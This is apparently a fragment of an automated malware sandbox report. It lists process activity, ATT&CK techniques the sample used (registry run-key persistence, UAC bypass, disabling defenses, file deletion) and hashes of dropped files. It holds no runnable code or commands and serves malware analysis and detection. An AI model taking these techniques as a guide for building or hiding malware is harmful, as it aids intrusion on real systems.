- Suspicious use of AdjustPrivilegeToken
PID:7536
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1380
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:5540
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5e7ef462f494df2b92e9186ee19e7e448
SHA1404e5394f3981e079a05c0f7e7691a9e481f4061
SHA256aa5ec698c2cf10353f001f812c5224dea9b60c5d13ab98ee7b497f3399ad9555
SHA5126a2dfe3d315b89828b0d7c4aeaaaf98fc64cb6946e0f66ba023bd47303ed1f1c956249261ef2fb38f1851b51715183a45a6f1f3f2e5f9b62ee4710754bdc8b17
-
Filesize
1KB
MD526ebb169a033bfc7bca3453ce7e92cb6
SHA12a8454186074eb017b224372737543c7d4a23085
SHA256d540b7aa0b1684aaeb245a2dacddba33155087fe95e6e4edb783330ab680115b
SHA512c05d0f68d39dcc069221ba704c5b7d712f58201d1f61342a248c80af496072514951a66c50089f2ef2b12d2d05fae2cf15b9fdbdfe030317da50bfb92c1e4e98
-
Filesize
12KB
MD5d8f8c04bcdec331637b4345dbe1fd41e
SHA1de4d57accb6f192f90b06e68e8db7e5057c99e88
SHA256198c8db24779c28e484039033b288ee88833bf352fabef60dbd494e2b62047d1
SHA512bd68dfd476198b155c8cc66dbac18993cfd5a0d0ce3bcff14867175a63b23ed0c4e45b9dd6eb95c7a4bee9a88545c4cb431b90df79fd1f98372271a7ee4246f0
-
Filesize
684B
MD54af08e28eeb2f720749f3eb765072791
SHA1d6b563ffd9eb67aed2dd210a1d7533f6d708c8df
SHA256a9ac1e7d190d97f78066bd29ca54daa7270b9d29d42d60befc3c481102a78979
SHA5122fd75e7c544f738f5a418a024a4184926548d87a03b948d2b4dcc48cbc4be4280656b16cc060a8da4a6c690056f9e9ca95ff656a7c73428770a6aaf447e6d9a2